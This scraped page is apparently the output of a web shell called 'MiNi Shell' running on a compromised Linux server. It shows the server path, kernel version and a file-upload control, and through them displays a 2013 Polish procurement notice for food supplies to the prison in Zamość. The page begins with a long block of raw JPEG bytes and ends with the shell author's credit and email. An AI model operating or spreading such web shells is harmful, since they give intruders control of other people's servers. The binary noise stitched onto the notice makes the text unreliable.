JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130925/196519-N-2013.html

<p class="kh_header"><b>Zamość: Dostawa artykułów spożywczych i pieczarek do Zakładu Karnego
 w Zamościu</b><br>
<b>Numer ogłoszenia: 196519 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Zamościu , ul. Okrzei 14, 22-400 Zamość, woj. lubelskie, tel. 0-84 6380070, faks 0-84 6395047.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych i pieczarek do Zakładu Karnego
 w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych i pieczarek do Zakładu Karnego w Zamościu.
Część I:
1. Kawa zbożowa - 900 kg;  
2. Herbata granulowana - 600 kg;  
3. Ocet - 200 l;     
4. Ketchup łagodny - 900 kg;  
5. Musztarda - 600 kg;  
6. Sól spożywcza - 1500 kg;  
7. Przyprawa do zup w płynie - 1100 l;     
8. Przyprawa warzywna - 1100 kg;  
9. Rosół z kury (kostka) - 550 kg;  
10. Bulion jarzynowy w proszku -140 kg;  
11. Sos biały w proszku - 150 kg;  
12. Sos węgierski w proszku - 170 kg;  
13. Fasola biała łuskana - 2200 kg;  
14. Groch łuskany - 1200 kg;  
15. Woda mineralna niegazowana (butelka 1,5 l) - 4000 l;     
16. Koncentrat pomidorowy 30% - 4000 kg;  
17. Chrzan tarty (słoik) - 350 kg.  
Część II:
1. Koper suszony, opakowanie do 1 kg - 30 kg;  
2. Liść laurowy suszony, opakowanie do 1 kg - 30 kg;  
3. Natka pietruszki suszona, opakowanie do 1 kg - 30 kg;  
4. Pieprz ziołowy mielony, opakowanie do 1 kg - 55 kg;  
5. Pieprz czarny mielony, opakowanie do 1 kg - 55 kg;  
6. Ziele angielskie suszone, opakowanie do 1 kg - 30 kg;  
7. Papryka ostra mielona, opakowanie do 1 kg - 10 kg;  
8. Papryka łagodna mielona, opakowanie do 1 kg - 10 kg;  
9. Majeranek mielona, opakowanie do 1 kg - 25 kg;  
10. Czosnek granulowany, opakowanie do 1 kg - 25 kg.
Cześć III:
1. Pieczarka świeża - czysta, wolna od szkodników, obcego zapachu, pozbawiona ciał obcych. Nie dopuszcza się produktów nadgniłych, albo o jakości obniżonej w stopniu powodującym niezdatność do spożycia. - 4000 kg.
Część IV:
1. Mąka pszenna - 1400 kg;  
2. Kasza gryczana - 1100 kg;  
3. Kasza jęczmienna drobna - 1500 kg;  
4. Kasza manna - 450 kg;  
5. Ryż - 2500 kg;  
6. Płatki owsiane - 250 kg.
Cześć V:
1. Margaryna do smarowania pieczywa  (kostka) 250g. - 5000 kg; 
2. Olej roślinny - 800 l.
Część VI:
1. Marmolada wieloowocowa - 1400 kg;  
2. Dżem wiśniowy	- 1000 kg;  
3. Dżem truskawkowy - 1000 kg;  
4. Dżem z czarnej porzeczki - 1000 kg;
Część VII:  
1. Cukier - 3000 kg;  
2. Makaron świderki - 3000 kg;  
3. Makaron nitki - 400 kg;  
4. Kostka sojowa - 500 kg;  
5. Kotlet sojowy - 400 kg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.86.10.00-1, 15.86.30.00-5, 15.87.11.20-1, 15.87.12.30-5, 15.87.12.50-1, 15.87.24.00-5, 15.87.10.00-4, 15.87.10.00-4, 15.89.15.00-5, 15.87.12.60-4, 01.12.12.13-7, 01.12.12.20-9, 15.98.10.00-8, 15.33.14.27-6, 15.33.11.10-1, 15.87.10.00-4, 15.87.21.00-2, 15.87.10.00-4, 15.87.23.00-4, 15.87.10.00-4, 01.12.12.60-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający odstępuje od pobierania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do SIWZ. Ocena spełnieniawedług formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do SIWZ. Ocena spełnieniawedług formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do SIWZ. Ocena spełnieniawedług formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do SIWZ. Ocena spełnieniawedług formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do SIWZ. Ocena spełnieniawedług formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Prawidłowo wypełniony i podpisany formularz ofertowy - załącznik nr 1.
2. Wypełnione i podpisane oświadczenie o danych wykonawcy - załącznik nr 2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W trakcie obowiązywania umowy strony dopuszczają zmiany cen w przypadku zmiany stawki podatku VAT, przy czym zmianie ulega wyłącznie cena brutto, cena netto pozostaje bez zmian.
2. Nowa stawka podatku VAT obowiązuje od dnia wejścia przepisów ją wprowadzających.
3. Ceny poszczególnych artykułów  zostaną automatycznie zmienione i dostosowane do obowiązujących przepisów. Odbiorca zapłaci Dostawcy cenę netto powiększoną o należny podatek VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Zamościu
ul. Okrzei 14, 22-400 Zamość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 09:00, miejsce: Zakład Karny w Zamościu /sekretariat/
ul. Okrzei 14, 22-400 Zamość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kawa zbożowa - 900 kg;  
2. Herbata granulowana - 600 kg;  
3. Ocet - 200 l;     
4. Ketchup łagodny - 900 kg;  
5. Musztarda - 600 kg;  
6. Sól spożywcza - 1500 kg;  
7. Przyprawa do zup w płynie - 1100 l;     
8. Przyprawa warzywna - 1100 kg;  
9. Rosół z kury (kostka) - 550 kg;  
10. Bulion jarzynowy w proszku -140 kg;  
11. Sos biały w proszku - 150 kg;  
12. Sos węgierski w proszku - 170 kg;  
13. Fasola biała łuskana - 2200 kg;  
14. Groch łuskany - 1200 kg;  
15. Woda mineralna niegazowana (butelka 1,5 l) - 4000 l;     
16. Koncentrat pomidorowy 30% - 4000 kg;  
17. Chrzan tarty (słoik) - 350 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.10.00-1, 15.86.30.00-5, 15.87.11.20-1, 15.87.12.30-5, 15.87.12.50-1, 15.87.24.00-5, 15.87.10.00-4, 15.89.15.00-5, 15.87.12.60-4, 01.12.12.13-7, 01.12.12.20-9, 15.98.10.00-8, 15.33.14.27-6, 15.33.11.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Koper suszony, opakowanie do 1 kg - 30 kg;  
2. Liść laurowy suszony, opakowanie do 1 kg - 30 kg;  
3. Natka pietruszki suszona, opakowanie do 1 kg - 30 kg;  
4. Pieprz ziołowy mielony, opakowanie do 1 kg - 55 kg;  
5. Pieprz czarny mielony, opakowanie do 1 kg - 55 kg;  
6. Ziele angielskie suszone, opakowanie do 1 kg - 30 kg;  
7. Papryka ostra mielona, opakowanie do 1 kg - 10 kg;  
8. Papryka łagodna mielona, opakowanie do 1 kg - 10 kg;  
9. Majeranek mielona, opakowanie do 1 kg - 25 kg;  
10. Czosnek granulowany, opakowanie do 1 kg - 25 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.10.00-4, 15.87.21.00-2, 15.87.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pieczarka świeża - czysta, wolna od szkodników, obcego zapachu, pozbawiona ciał obcych. Nie dopuszcza się produktów nadgniłych, albo o jakości obniżonej w stopniu powodującym niezdatność do spożycia. - 4000 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.12.60-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mąka pszenna - 1400 kg;  
2. Kasza gryczana - 1100 kg;  
3. Kasza jęczmienna drobna - 1500 kg;  
4. Kasza manna - 450 kg;  
5. Ryż - 2500 kg;  
6. Płatki owsiane - 250 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.61.30.00-8, 15.61.41.00-6, 15.61.33.80-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Margaryna do smarowania pieczywa  (kostka) 250g. - 5000 kg; 
2. Olej roślinny - 800 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-9, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Marmolada wieloowocowa - 1400 kg;  
2. Dżem wiśniowy	- 1000 kg;  
3. Dżem truskawkowy - 1000 kg;  
4. Dżem z czarnej porzeczki - 1000 kg;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.30-5, 15.33.22.94-1, 15.33.22.96-5, 15.33.22.93-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier - 3000 kg;  
2. Makaron świderki - 3000 kg;  
3. Makaron nitki - 400 kg;  
4. Kostka sojowa - 500 kg;  
5. Kotlet sojowy - 400 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4, 15.85.11.00-9, 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com